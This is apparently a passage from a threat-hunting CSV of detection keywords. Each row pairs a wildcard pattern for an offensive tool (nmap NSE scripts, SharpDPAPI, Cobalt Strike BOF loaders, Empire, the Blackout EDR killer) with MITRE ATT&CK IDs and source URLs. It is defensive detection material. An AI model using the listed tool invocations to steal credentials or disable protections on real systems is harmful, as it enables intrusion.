tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"* bhqc.py -*","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/kaluche/bloodhound-quickwin","1","0","N/A","6","2","162","17","2023-07-17T14:31:51Z","2021-02-16T16:04:16Z" +"* -bindPipe * 
-destHost * -destPort *","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" +"* bitcoin-getaddr.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* bitcoin-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* bitcoinrpc-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* bittorrent-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* bjnp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* Blackout.cpp*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"* Blackout.sln*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"* Blackout.sys*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"* bleeding-jumbo john*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* 
blindeventlog.exe*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" +"* blob /target:*.bin* /pvk:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* blob /target:*.bin* /unprotect*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* --blockDLLs --ruy-lopez*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","1","N/A","N/A","N/A","N/A" +"* --bloodhound --ns ip --collection All*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* bof_allocator *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"* bof_reuse_memory *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 
T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"* -BOFBytes *","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" +"* BOFNET *","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"* BofRunner(*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" +"* -bootkey *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* Brc4LdapSentinelParser*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by 
ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"* broadcast-ataoe-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-avahi-dos.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-bjnp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-db2-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-dhcp6-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-dhcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-dns-service-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-dropbox-listener.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-eigrp-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-hid-discoveryd.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-igmp-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-jenkins-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-listener.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-ms-sql-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-netbios-master-browser.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-networker-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-novell-locate.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-ospf2-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-pc-anywhere.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-pc-duo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-pim-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-ping.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-pppoe-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-rip-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-ripng-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-sonicwall-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-sybase-asa-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-tellstick-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-upnp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-versant-locate.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-wake-on-lan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* broadcast-wpad-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
